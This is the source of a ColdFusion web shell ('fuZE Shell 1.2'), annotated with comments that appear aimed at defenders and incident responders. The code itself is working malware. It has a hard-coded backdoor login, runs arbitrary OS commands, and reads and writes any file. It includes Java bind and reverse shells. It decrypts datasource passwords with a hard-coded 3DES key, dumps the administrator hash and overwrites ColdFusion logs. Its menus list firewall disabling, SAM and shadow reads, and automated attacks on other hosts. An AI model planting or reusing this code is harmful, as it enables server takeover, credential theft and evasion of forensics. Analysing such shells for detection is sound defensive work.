  1. <html>
  2.  
  3. <!---
  4. #======================================#
  5. # DeV: XiX .### 9/26/11 #
  6. # # #
  7. # ### /##/ #
  8. # # ,# #
  9. # v3r 1.2 \#####` #
  10. #======================================#
  11. # FuZE #
  12. #======================================#
  13. # #
  14. # Changes in this release: #
  15. # > AutoPWN improved #
  16. # #
  17. # ThX ^_^: #
  18. # > fractal - css & jquery #
  19. # > chippy1337 #
  20. # > MoJiNao, xXx, & Seraph #
  21. # #
  22. #======================================#
  23. --->
  24.  
<!--- _________Login_config_________ ---->
<!--- Hard-coded credential for the shell's own login form (checked by the
      LoginButton handler further down). The stored value is a 32-hex digest
      compared against Hash(Form.Password); ColdFusion's Hash() with no
      algorithm argument is MD5 (the author's own "MD5" note confirms it), so
      this is an unsalted, crackable MD5 of the backdoor password.
      Defenders: both strings are usable as detection/IOC material for this
      fuZE variant. --->
<cfset UserName="Vexy">
<cfset Password="32250170a0dca92d53ec9624f336ca24"> <!--- MD5 --->
<!--- ------------------------------ ---->
  29.  
<head>
<!--- Let a single request run for up to an hour; the command-execution
      branch later reuses 3600 as its "no limit" timeout, and the bind/reverse
      shell branches block the request thread on a socket for their whole
      session. --->
<cfsetting requesttimeout="3600">
<!--- Recorded here but not referenced anywhere in the visible part of the page. --->
<cfset tickBegin = GetTickCount()>
<!--- java.lang.System is used by the header table to print the OS account
      ColdFusion runs as (System.getProperty("user.name")). --->
<cfset so = CreateObject("java", "java.lang.System")>
<!--- Attach to, or failing that create, the Windows Scripting.FileSystemObject
      COM object. This only works on Windows with COM enabled; both failures are
      silently swallowed and FSO simply stays undefined (the drive listing
      below then prints "N/A"). --->
<cftry>
<cfobject type="com" class="scripting.filesystemobject" name="fso" action="connect">
<cfcatch type="any">
<cftry>
<cfobject type="com" class="scripting.filesystemobject" name="fso" action="create">
<cfcatch> <!--- N/A ---> </cfcatch>
</cftry>
</cfcatch>
</cftry>
<cfif isDefined("FSO")><cfset Drives = FSO.Drives></cfif>
<!--- Icon URLs are intentionally empty; the <img>/<link> tags below render
      with an empty src/href. --->
<cfset icon = "">
<cfset icon_close = "">
<title>.:: &fnof;uZE Shell ::.</title>
<link rel="SHORTCUT ICON" href="<cfoutput>#icon#</cfoutput>">
<style type="text/css">
/* Dark-theme styling for the shell UI. #mask and #boxes .window are the
   overlay and hidden modal panels driven by the jQuery handler in the
   <script> block that follows; ._btn / #_color style the form controls
   inside those panels. Nothing here affects server-side behaviour. */
html,body{font-family:Verdana,Arial,Helvetica,sans-serif;font-size:11px;background-color:black;color:#bbbbbb;height:98%;overflow:inherit}
table.header-table td { padding:10px; border-width:5px; border-style:outset; }
table.content-table td { padding:10px; border-width:5px; border-style:outset; }
table.function-table td { padding:10px; border-width:5px; border-style:outset; }
textarea.report { width:100%;min-width:400px;background-color:black;color:#bbbbbb; }
#mask { position:absolute; z-index:9000; background-color:#000; display:none; }
#boxes .window { position:fixed; left:0; top:0; width:530px; display:none; z-index:9999; padding:20px; background-color:black;color:#bbbbbb;border-left:solid 1px #00009f;border-right:solid 1px #00009f;border-bottom:solid 1px #00009f; }
#layer1_handle{position:relative;background-color:#00009F;padding:2px;text-align:center;color:#FFF;vertical-align:middle;top:-35px;margin-left:-21px;margin-right:-21px;}
#_close{float:right;text-decoration:none;color:#FFF;}
#_color{background-color:black;color:#bbbbbb;}
#nav a{height:14px;display:block;border:1px solid #000;color:#FFF;text-decoration:none;background-color:#000098;padding-bottom:5px}
#nav a:hover{background-color:#696AF6;color:#FFF}
._btn{padding:0;margin:0;width:80px;font-size:12px;background-color:#0000B0;color:#bbbbbb;}
.container{position:relative;top:-115px;text-align:center;font-size:14px;float:right;}
.menu{position:relative;top:-21px;height:20px;width:280px;float:right;padding-top:5px;padding-bottom:5px;}
</style>
<!--- jQuery 1.x is loaded from Google's CDN over plain http, pinned only to
      the major version and with no integrity attribute, so whatever the CDN
      (or anyone on the path) serves is executed unverified. The fetch is made
      by the operator's browser, not by the server, so it will not show up in
      the server's egress logs; browsers do normally send the shell's URL as
      the Referer on that request. --->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script>
<script>
// Generic jQuery modal: each <a name="modal" href="#panelId"> opens the
// matching .window div over a dimmed #mask. No such anchors appear in the
// portion of the page visible here, so the nav links that use this live
// further down the file.
$(document).ready(function() {
//select all the a tag with name equal to modal
$('a[name=modal]').click(function(e) {
//Cancel the link behavior
e.preventDefault();
//Get the A tag: its href ("#execute", "#edit", ...) doubles as the panel selector
var id = $(this).attr('href');
//Get the screen height and width
var maskHeight = $(document).height();
var maskWidth = $(window).width();
//Set height and width to mask to fill up the whole screen
$('#mask').css({'width':maskWidth,'height':maskHeight});
//transition effect
$('#mask').fadeIn(1000);
$('#mask').fadeTo("slow",0.8);
//Get the window height and width
var winH = $(window).height();
var winW = $(window).width();
//Set the popup window to center
$(id).css('top', winH/2-$(id).height()/2);
$(id).css('left', winW/2-$(id).width()/2);
//transition effect
$(id).fadeIn(2000);
});
//if close button is clicked
$('.window .close').click(function (e) {
//Cancel the link behavior
e.preventDefault();
$('#mask, .window').hide();
});
//if mask is clicked: clicking outside a panel also dismisses it
$('#mask').click(function () {
$(this).hide();
$('.window').hide();
});
});
</script>
</head>
  105. <body>
  106.  
<!--- Login handler. The login form itself is not in the visible part of the
      page (presumably rendered when IsUserLoggedIn() is false).
      Notes for reviewers:
      - IsDefined("LoginButton") is unscoped, so a URL parameter would satisfy
        it too; Form.UserName is then read without an isDefined guard, so a
        request carrying LoginButton but no UserName field raises a CF error
        rather than failing closed.
      - Hash() with no algorithm is MD5, matching the digest stored in
        Password above. CF's "eq" is a case-insensitive string compare, so the
        username check is case-insensitive as well.
      - No CSRF token and no rate limiting on this check. --->
<cfif IsDefined("LoginButton")>
<cfif Form.UserName eq "#UserName#" and Hash("#Form.Password#") eq "#Password#">
<!--- Establish a ColdFusion session login with the "admin" role;
      IsUserLoggedIn() below gates every shell feature on this. --->
<cflogin>
<cfloginuser name="#UserName#" password="#Password#" roles="admin">
</cflogin>
</cfif>
</cfif>

<!--- Logout: posted by the cfform in the header table. --->
<cfif IsDefined("LogoutButton")>
<cflogout>
</cfif>
  118.  
  119. <cfif IsUserLoggedIn() eq "Yes">
<!--- Hidden modal panels, one per shell feature, shown by the jQuery handler
      in <head>. Every form POSTs back to this same script (CGI.SCRIPT_NAME);
      the handlers at the bottom of the page dispatch on which Form field is
      present (exec, EditFile, SaveFile, bindport, reverseip/reverseport,
      function, ...). Previously submitted values are re-echoed through
      htmleditformat(), so the shell's own UI is output-encoded. The feature
      list below is a useful IR checklist of what an operator could have done
      from this page. --->
<div id="boxes">
<!--- Arbitrary OS command execution (cmd.exe /c or sh -c, see the Form.exec handler). --->
<div id="execute" class="window">
<div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Console</div>
<center><pre>:: Execute command on server ::</pre></center>
<form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
<input type="text" id="_color" name="exec" size=40 <cfif isdefined("Form.exec")>value="<cfoutput>#htmleditformat(Form.exec)#</cfoutput>"</cfif>>
<input name="submit" value="Execute" class="_btn" type="submit"><br />
<!--- "nolimit" raises the cfexecute timeout from 10 s to 3600 s. --->
<input type=checkbox name="nolimit"> No execution time limit
</form><br />
</div>
<!--- Read any file the CF service account can read, then save it back (Form.EditFile / Form.SaveFile). --->
<div id="edit" class="window">
<div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Edit</div>
<center><pre>:: Edit file ::</pre></center>
<form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
File path | <input type="text" id="_color" name="EditFile" size=40 <cfif isDefined("Form.EditFile")>value="<cfoutput>#htmleditformat(Form.EditFile)#</cfoutput>"</cfif>>
<input name="submit" value="Edit" class="_btn" type="submit">
</form><br />
</div>
<!--- Reverse shell: the server opens a TCP connection out to reverseip:reverseport. --->
<div id="reverse" class="window">
<div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Reverse Shell</div>
<center><pre>:: Reverse shell ::</pre></center>
<form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
<center><input type="text" id="_color" name="reverseip" size=15 <cfif isDefined("Form.reverseip")>value="<cfoutput>#htmleditformat(Form.reverseip)#</cfoutput>"</cfif>> :
<input type="text" id="_color" name="reverseport" size=5 <cfif isDefined("Form.reverseport")>value="<cfoutput>#htmleditformat(Form.reverseport)#</cfoutput>"</cfif>>
<input name="submit" value="Connect" class="_btn" type="submit"></center>
</form>
</div>
<!--- Bind shell: the server listens on bindport. The [1024-65535] hint is
      display-only; the handler performs no range check. --->
<div id="bind" class="window">
<div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Bindshell</div>
<center><pre>:: Bindshell ::</pre></center>
<form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
<center>[1024-65535] <input type="text" id="_color" name="bindport" size=10 <cfif isdefined("Form.bindport")>value="<cfoutput>#htmleditformat(Form.bindport)#</cfoutput>"</cfif>>
<input name="submit" value="Bind" class="_btn" type="submit">
<!--- Inline data: URI; its base64 body was removed from this copy of the file. --->
<a href="data:text/html;base64,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"> [Tips]</a></center>
</form>
</div>
<!--- Canned post-exploitation actions; the option text is the cfswitch key
      used by the Form.function handler (credential dumping, log wiping,
      firewall/telnet changes, hive reads, SUID/shadow enumeration, ...). --->
<div id="functions" class="window">
<div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Functions</div>
<center><pre>:: Functions ::</pre></center>
<form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
<select name="function" style="width: 325px">
<option selected="yes">Select a function</option><optgroup label="ColdFusion"><option>Dump datasource passwords</option><option>Dump CF hashes</option><option>Restart JRUN server (CF)</option><option>Wipe ColdFusion logs</option></optgroup><optgroup label="Windows"><option>Disable Windows firewall</option><option>Enable Telnet service</option><option>Show opened ports [W]</option><option>Read SAM</option><option>Read SECURITY</option><option>Read SYSTEM</option><option>Read IIS paths</option><option>View open sessions [W]</option><option>View local shares</option><option>View domain shares</option><option>View users</option><option>View running processes [W]</option><option>View system info [W]</option><option>Check disk for consistency</option></optgroup><optgroup label="Linux"><option>Find SUID files</option><option>Find SGID files</option><option>Find all *conf* files</option><option>Find all .*_history files</option>
<option>Find all *.pwd files</option><option>Find all .*rc files</option><option>Find all writable directories and files</option><option>Find all writable directories and files in current dir</option><option>Read /etc/passwd</option><option>Read /etc/shadow</option><option>Read /proc/self/environ</option><option>Show opened ports [L]</option><option>View open sessions [L]</option><option>View recent sessions</option><option>View running processes [L]</option>
<option>View memory info</option><option>View CPU info</option><option>View system info [L]</option></optgroup></select><input name="submit" value="Execute" class="_btn" type="submit"></form>
</div>
<!--- The handlers for the remaining panels (decrypt_hash, File/Download,
      RUpload, exec_sql, cfscan, regpath, target_host, nuke, irc*) are not in
      the visible part of the page. --->
<div id="decrypt" class="window">
<div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Decrypter</div>
<center><pre>:: CF hash decrypter ::</pre></center>
<form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
B64 CF hash | <input type="text" id="_color" name="decrypt_hash" size=35 <cfif isdefined("Form.decrypt_hash")>value="<cfoutput>#htmleditformat(Form.decrypt_hash)#</cfoutput>"</cfif>>
<input name="submit" value="Decrypt" class="_btn" type="submit">
</form>
</div>
<div id="updown" class="window">
<div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>File Transfer</div>
<center><pre>:: Upload/Download files on server ::</pre></center>
<form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>" enctype="multipart/form-data" name="Upload" id="Upload"><center>
<input type="file" name="File"/>
<input class="_btn" type="submit" name="Upload" value="Upload"/></center>
</form>
<form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
Path | <input type="text" id="_color" name="Download" size=40 <cfif isDefined("Form.Download")>value="<cfoutput>#htmleditformat(Form.Download)#</cfoutput>"</cfif>>
<input name="submit" value="Download" class="_btn" type="submit">
</form>
</div>
<div id="upremote" class="window">
<div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Remote upload</div>
<center><pre>:: Upload files from remote server ::</pre></center>
<form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
URL | <input type="text" id="_color" name="RUpload" size=40 <cfif isDefined("Form.RUpload")>value="<cfoutput>#htmleditformat(Form.RUpload)#</cfoutput>"</cfif>>
<input name="submit" value="Upload" class="_btn" type="submit">
</form>
</div>
<div id="runsql" class="window">
<div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Sql</div>
<center><pre>:: Run SQL query ::</pre></center>
<form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
SQL query | <input type="text" id="_color" name="exec_sql" size=35<cfif isdefined("Form.exec_sql")>value="<cfoutput>#htmleditformat(Form.exec_sql)#</cfoutput>"</cfif>><br />
Datasource | <input type="text" id="_color" name="datasource" size=15<cfif isdefined("Form.datasource")>value="<cfoutput>#htmleditformat(Form.datasource)#</cfoutput>"</cfif>><br />
User : Pass | <input type="text" id="_color" name="db_username" size=15 <cfif isdefined("Form.db_username")>value="<cfoutput>#htmleditformat(Form.db_username)#</cfoutput>"</cfif>><input type="text" id="_color" name="db_password" size=15 <cfif isdefined("Form.db_password")>value="<cfoutput>#htmleditformat(Form.db_password)#</cfoutput>"</cfif>><br />
<input name="submit" value="Run" class="_btn" type="submit">
</form>
</div>
<div id="scanlan" class="window">
<div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Scan</div>
<center><pre>:: Scan LAN for CF ::</pre></center>
<form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
<center><input name="cfscan" value="Scan" class="_btn" type="submit"></center>
</form>
</div>
<!--- Registry panel defaults the path to HKEY_LOCAL_MACHINE\ and offers dWord/string value types. --->
<div id="registry" class="window">
<div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Registry</div>
<center><pre>:: Registry ::</pre></center>
<form method="post" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>"><table>
<tr><td>Path | </td><td><input name="regpath" type="text" id="_color" size="40" value="<cfif isDefined("Form.regpath")><cfoutput>#htmleditformat(Form.regpath)#</cfoutput><cfelse>HKEY_LOCAL_MACHINE\</cfif>" /></td></tr><tr>
<td>Key | </td><td><input type="text" id="_color" name="Entry" size="15" <cfif isDefined("Form.Entry")>value="<cfoutput>#htmleditformat(Form.Entry)#</cfoutput>"</cfif> /></td></tr><tr>
<td>New key | </td><td><input type="text" id="_color" name="newentry" size="15" <cfif isDefined("Form.newentry")>value="<cfoutput>#htmleditformat(Form.newentry)#</cfoutput>"</cfif> /></td></tr></table>
<select name="regtype">
<option value="dWord">dWord</option>
<option value="string">string</option>
</select>
<br />
<input class="_btn" type="submit" name="Submit" value="Submit" />
</form>
</div>
<!--- Lateral movement against another ColdFusion host; the form forces a plain http:// prefix. --->
<div id="autopwn" class="window">
<div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>AutoPWN</div>
<center><pre>:: AutoPWN remote CF ::</pre></center>
<form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
Target | http://<input type="text" id="_color" name="target_host" size=40 <cfif isDefined("Form.target_host")>value="<cfoutput>#htmleditformat(Form.target_host)#</cfoutput>"</cfif>>/
<input name="submit" value="AutoPWN" class="_btn" type="submit">
</form>
</div>
<!--- Self-removal of the shell. --->
<div id="nuke" class="window">
<div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Nuke</div>
<center><pre>:: Nuke shell ::</pre></center>
<form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
<center><input name="nuke" value="Nuke" class="_btn" type="submit"></center>
</form>
</div>
<!--- IRC relay. Default values (127.0.0.1:6667, nick/user "fuZE", channel
      "#fuZE", real name "fuZE CF IRC Datapipe") are useful network IOCs. --->
<div id="irc" class="window">
<div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>IRC</div>
<center><pre>:: IRC datapipe ::</pre></center>
<table>
<form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>"><center>
<tr><td>IP:</td><td><input type="text" id="_color" name="ircip" size=15 <cfif isDefined("Form.ircip")>value="<cfoutput>#htmleditformat(Form.ircip)#</cfoutput>"<cfelse>value="127.0.0.1"</cfif>></td></tr>
<tr><td>Port:</td><td><input type="text" id="_color" name="ircport" size=5 <cfif isDefined("Form.ircport")>value="<cfoutput>#htmleditformat(Form.ircport)#</cfoutput>"<cfelse>value="6667"</cfif>></td></tr>
<tr><td>Nick name:</td><td><input type="text" id="_color" name="ircnick" size=15 <cfif isDefined("Form.ircnick")>value="<cfoutput>#htmleditformat(Form.ircnick)#</cfoutput>"<cfelse>value="fuZE"</cfif>></td></tr>
<tr><td>User name:</td><td><input type="text" id="_color" name="ircuname" size=15 <cfif isDefined("Form.ircuname")>value="<cfoutput>#htmleditformat(Form.ircuname)#</cfoutput>"<cfelse>value="fuZE"</cfif>></td></tr>
<tr><td>Real name:</td><td><input type="text" id="_color" name="ircrname" size=20 <cfif isDefined("Form.ircrname")>value="<cfoutput>#htmleditformat(Form.ircrname)#</cfoutput>"<cfelse>value="fuZE CF IRC Datapipe"</cfif>></td></tr>
<tr><td>Channel:</td><td><input type="text" id="_color" name="ircchan" size=15 <cfif isDefined("Form.ircchan")>value="<cfoutput>#htmleditformat(Form.ircchan)#</cfoutput>"<cfelse>value="#fuZE"</cfif>></td></tr>
<tr><td><input name="submit" value="Connect" class="_btn" type="submit"></center></td></tr>
</form>
</table>
</div>
<!--- Full-page overlay behind an open modal. --->
<div id="mask"></div>
</div>
<!--- Header banner. In one request this discloses: server time, the
      operator's and the server's IP/host, OS name/version/arch, CF product
      and version, the OS account CF runs as, the directory this template
      lives in (i.e. where the shell was dropped) and, on Windows with the FSO
      COM object available, every drive letter with its size and type. All of
      that is good triage data if the page is recovered from a proxy cache or
      operator screenshot. --->
<table class="header-table" width=100%>
<tr>
<td><img src="<cfoutput>#icon#</cfoutput>"><sup> &fnof;uZE Shell 1.2</sup></td>
<td><div style="float:left;"><cfoutput><pre>#dateformat(now(),'mm-dd-yyyy')# #timeformat(now(),'HH:mm:ss')# Your IP: #cgi.remote_addr# [#cgi.remote_host#] Server IP: #cgi.local_addr# [#cgi.http_host#]</pre></cfoutput></div>
<!--- Logout posts LogoutButton back to this page (empty action). NOTE(review):
      cfform normally makes CF emit a reference to /CFIDE/scripts/cfform.js,
      which can be another access-log artefact of this page being opened. --->
<div style="float:right;"><cfform action="" method="post" name="LogoutForm"><cfinput class="_btn" type="submit" name="LogoutButton" value="Logout"></cfform></div>
</td>
</tr>
<tr>
<td align="right"><pre>OS :<br />CF :<br />ID :<br />CWD :<br />Drive info :</pre></td>
<td>
<cfoutput>
<!--- Drive loop skips A:; "evaluate" here is only doing arithmetic on an
      FSO-supplied number, so it is needless rather than dangerous. --->
<pre>#server.os.name# [#server.os.version#] #server.os.arch#<br />#server.coldfusion.productname# [#server.coldfusion.productlevel#] #server.coldfusion.productversion#<br />#so.getProperty("user.name")#<br />#getDirectoryFromPath(getCurrentTemplatePath())#<br /><cfif isDefined("FSO")><cfloop collection="#drives#" item="this"><cfif this.DriveLetter is not "A">#this.DriveLetter# [<cfif this.isReady AND ISDefined("this.TotalSize")>#NumberFormat(round(evaluate(this.TotalSize/1024/1024/1024)))# GB </cfif><cfswitch expression="#this.DriveType#">
<cfcase value="1">Removable</cfcase>
<cfcase value="2">Fixed</cfcase>
<cfcase value="3">Network</cfcase>
<cfcase value="4">CDROM</cfcase>
<cfcase value="5">RAMDisk</cfcase>
<cfdefaultcase>Unknown</cfdefaultcase>
</cfswitch>] </cfif></cfloop><cfelse>N/A</cfif></pre>
</cfoutput>
</td>
</tr>
</table>
  280.  
<table class="content-table" width=100%>
<!--- Result area. Everything from here on is inside one <cfoutput>, so "##"
      in attribute values further down is an escaped "#". --->
<tr><td width="75%"><cfoutput>
<!--- Command execution. Form.exec is passed to the OS shell as-is: on Windows
      verbatim after "cmd.exe /c", on everything else inside double quotes
      after "sh -c" with any double quote in the input turned into a single
      quote (the """" in the attribute is CFML's escaped "). There is no
      further escaping - arbitrary command execution is the feature. Timeout
      is 10 s, or 3600 s when the "nolimit" checkbox was sent; output is
      HTML-encoded into the textarea. --->
<cfif isdefined("Form.exec")>
<cfif isdefined("Form.nolimit")><cfset exectimeout=3600><cfelse><cfset exectimeout=10></cfif>
<cfif server.os.name neq "UNIX">
<pre>Executing 'cmd.exe /c #htmleditformat(Form.exec)#'</pre>
<cfexecute name="cmd.exe" arguments="/c #Form.exec#" timeout="#exectimeout#" variable="cmdout"></cfexecute>
<cfelse>
<pre>Executing 'sh -c "#htmleditformat(REReplace(Form.exec,"""","'","ALL"))#"'</pre>
<cfexecute name="sh" arguments="-c ""#REReplace(Form.exec,"""","'","ALL")#""" timeout="#exectimeout#" variable="cmdout"></cfexecute>
</cfif>
<textarea class="report" rows="20">#htmleditformat(cmdout)#</textarea>
<!--- File read for the editor. Any path the CF service account can read is
      accepted (no root-jail); a missing file is turned into a thrown
      "File not found" so the cfcatch below reports it. The file body is
      HTML-encoded into the textarea. --->
<cfelseif isdefined("Form.EditFile")>
<pre>Editing file '#htmleditformat(Form.EditFile)#'</pre>
<cftry>
<cfif fileexists(Form.EditFile)>
<!--- OK --->
<cfelse>
<cfthrow message="File not found">
</cfif>
<cffile action="Read" file="#Form.EditFile#" variable="FileData">
<form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
<textarea name="FileContent" class="report" rows="20"><cfoutput>#htmleditformat(FileData)#</cfoutput></textarea>
<!--- NOTE(review): unlike every other echo on this page, Form.EditFile is
      written into this value attribute without htmleditformat(), so a path
      containing a double quote breaks out of the attribute. Only the
      already-authenticated operator can trigger it, but it is inconsistent
      with the line above. --->
Save to | <input type="text" id="_color" name="SaveFile" size=40 value="<cfoutput>#Form.EditFile#</cfoutput>"> <input name="submit" value="Save" class="_btn" type="submit">
</form>
<cfcatch><textarea class="report" rows="20">Error<cfif isDefined("cfcatch.message")>: <cfoutput>#cfcatch.message#</cfoutput></cfif></textarea></cfcatch>
</cftry>
  308. <cfelseif isDefined("Form.SaveFile")>
  309. <pre>Saving file '#htmleditformat(Form.SaveFile)#'</pre>
  310. <textarea class="report" rows="20">
  311. <cftry>
  312. <cffile action="Write" file="#Form.SaveFile#" output="#Form.FileContent#" addnewline = "no">Save success
  313. <cfcatch>Error<cfif isDefined("cfcatch.message")>: <cfoutput>#cfcatch.message#</cfoutput></cfif></cfcatch>
  314. </cftry>
  315. </textarea>
<!--- Bind shell. Listens on Form.bindport (no range or numeric check despite
      the [1024-65535] hint in the form) and serves exactly one client, on the
      request thread - accept() blocks until someone connects, which is
      presumably why requesttimeout was raised to 3600 at the top of the page.
      Detection: a new listening socket owned by the ColdFusion JVM process. --->
<cfelseif isdefined("Form.bindport")>
<pre>Binding shell to port #htmleditformat(Form.bindport)#</pre>
<textarea class="report" rows="20">
<cftry>
<cfscript>
try{

// Create socket
// Form.bindport is a string; CF coerces it to the int ServerSocket(int) expects.
serversocket=createObject("java","java.net.ServerSocket");
serversocket.init(Form.bindport);
writeoutput("ServerSocket created at port #serversocket.getLocalPort()##chr(10)#");

// Accept incoming connections (blocking; first client wins)
connection=serversocket.accept();
writeoutput("Connection received from #connection.getInetAddress().getHostName()##chr(10)#");

// Establish connection
try{
instream=createObject("java","java.io.BufferedReader").init(createObject("java","java.io.InputStreamReader").init(connection.getInputStream()));
outstream=createObject("java","java.io.PrintWriter").init(connection.getOutputStream());
writeoutput("Connection successful!#chr(10)#");
} catch (IOException e) {
writeoutput("IO Exception: Read failed#chr(10)#");
}

// Communicate
// Each received line is split on single spaces and launched directly via
// ProcessBuilder - no shell is involved, so no quoting, globbing, pipes or
// redirection. Only stdout is relayed back; stderr is never read.
outstream.println(".:: fuZE CF Bindshell ::.");
outstream.print("> ");
outstream.flush();
while(True){
str = instream.readLine();
cmd = str.split(" ");
if (not str.matches("exit")){
p = createObject("java","java.lang.ProcessBuilder").init(cmd).start();
i = createObject("java","java.io.InputStreamReader").init(p.getInputStream());
br = createObject("java","java.io.BufferedReader").init(i);
line=br.readLine();
// readLine() returns Java null at EOF; CF treats a null assignment as
// leaving the variable undefined, which is what ends this loop.
while (isDefined("line")) {
outstream.println(line);
outstream.flush();
line = br.readLine();
}
br.close();
i.close();
outstream.print("> ");
outstream.flush();
}
else {
// "exit": tear everything down. There is no break, so the next readLine()
// on the closed stream throws and the outer catch below ends the session.
outstream.println("Terminating");
outstream.close();
instream.close();
connection.close();
serversocket.close();
}
}

}catch (Exception e) {
writeoutput("Exception: Error#chr(10)#");
}
</cfscript>
<cfcatch>Connection terminated</cfcatch>
</cftry>
</textarea>
<!--- Reverse shell. The server connects out to Form.reverseip:Form.reverseport
      (port passed as a string and coerced; connect() is called without a
      timeout, so an unreachable host holds the request thread until the TCP
      stack gives up) and then serves the same line-oriented command loop as
      the bind shell. Detection: an outbound TCP connection from the ColdFusion
      JVM to an arbitrary host/port. --->
<cfelseif isDefined("Form.reverseip") and isDefined("Form.reverseport")>
<pre>Sending shell to #htmleditformat(Form.reverseip)#:#htmleditformat(Form.reverseport)#</pre>
<textarea class="report" rows="20">
<cftry>
<cfscript>
try{

// Create socket
socket=createObject("java","java.net.Socket");

// Connect to remote host
socket.connect(createObject("java","java.net.InetSocketAddress").init(Form.reverseip,Form.reverseport));
writeoutput("Remote port reached: #socket.isConnected()##chr(10)#");

// Establish connection
try{
instream=createObject("java","java.io.BufferedReader").init(createObject("java","java.io.InputStreamReader").init(socket.getInputStream()));
outstream=createObject("java","java.io.PrintWriter").init(socket.getOutputStream());
writeoutput("Connection successful!#chr(10)#");
} catch (IOException e) {
writeoutput("IO Exception: Read failed#chr(10)#");
}

// Communicate
// Each line from the remote end is split on spaces and run directly via
// ProcessBuilder (no shell semantics); only stdout is sent back.
outstream.println(".:: fuZE CF Reverse Shell ::.");
outstream.print("> ");
outstream.flush();
while(True){
str = instream.readLine();
cmd = str.split(" ");
if (not str.matches("exit")){
p = createObject("java","java.lang.ProcessBuilder").init(cmd).start();
i = createObject("java","java.io.InputStreamReader").init(p.getInputStream());
br = createObject("java","java.io.BufferedReader").init(i);
line=br.readLine();
// Java null at EOF leaves "line" undefined in CF, ending the loop.
while (isDefined("line")) {
outstream.println(line);
outstream.flush();
line = br.readLine();
}
br.close();
i.close();
outstream.print("> ");
outstream.flush();
}
else {
// "exit" closes the socket; with no break the next readLine() throws
// and the outer catch ends the session.
outstream.println("Terminating");
outstream.close();
instream.close();
socket.close();
}
}

}catch (Exception e) {
writeoutput("Exception: Error#chr(10)#");
}
</cfscript>
<cfcatch>Connection terminated</cfcatch>
</cftry>
</textarea>
  439. <cfelseif isDefined("Form.function")>
  440. <pre>Function: '#htmleditformat(Form.function)#'</pre>
  441. <textarea class="report" rows="20">
  442. <cftry>
  443. <cfswitch expression="#Form.function#">
<!--- ColdFusion functions --->
<!--- Enumerates every configured datasource through the internal
      ServiceFactory and decrypts the stored password with a hard-coded
      3DES key. That key appears to be the static one ColdFusion of this era
      used to seal datasource passwords in its own config - confirm against
      the installed version. Output: "<dsn> : <cleartext password>" per line. --->
<cfcase value="Dump datasource passwords">Datasource : Password
<cfscript>
o=createobject("java","coldfusion.server.ServiceFactory").getDatasourceService().getDatasources();
for(i in o) {
if(len(o[i]["password"])){
dp=Decrypt(o[i]["password"], generate3DesKey("0yJ!@1$r8p0L@r1$6yJ!@1rj"), "DESede", "Base64") ;
writeoutput("#htmleditformat(i)# : #htmleditformat(dp)##chr(10)#");
}
}
</cfscript>
</cfcase>
<!--- Reads <CF root>\lib\password.properties (the file holding the CF
      Administrator password hash) with a Windows-style backslash path. --->
<cfcase value="Dump CF hashes"><cffile action="READ" file="#Server.ColdFusion.RootDir#\lib\password.properties" variable="cfhashes">#htmleditformat(cfhashes)#</cfcase>
<!--- Restarts the JRun server hosting ColdFusion. jrunx.kernel.JRun only
      exists on JRun-based deployments; elsewhere CreateObject throws. --->
<cfcase value="Restart JRUN server (CF)">
<cfscript>
oJRun = CreateObject("java","jrunx.kernel.JRun");
oJRun.restart(oJRun.getServerName());
</cfscript>
</cfcase>
<!--- Anti-forensics: overwrites every *.log in the CF logging directory with
      the single line "# Purged" ("##" is an escaped "#" inside the enclosing
      cfoutput). Only files matching *.log are touched; web-server access logs
      and anything not in that directory survive. --->
<cfcase value="Wipe ColdFusion logs">
<cfset sf = CreateObject("java", "coldfusion.server.ServiceFactory")>
<cfset logDir = sf.LoggingService.getLogDirectory()>
<cfif server.os.name neq "UNIX">
<cfset osSlash = "\">
<cfelse>
<cfset osSlash = "/">
</cfif>
<cfdirectory action="list" directory="#logDir#" name="logs" filter="*.log">
<cfloop query="logs">
<cffile action="write" file="#logDir##osSlash##logs.Name#" output="## Purged" addnewline="yes">
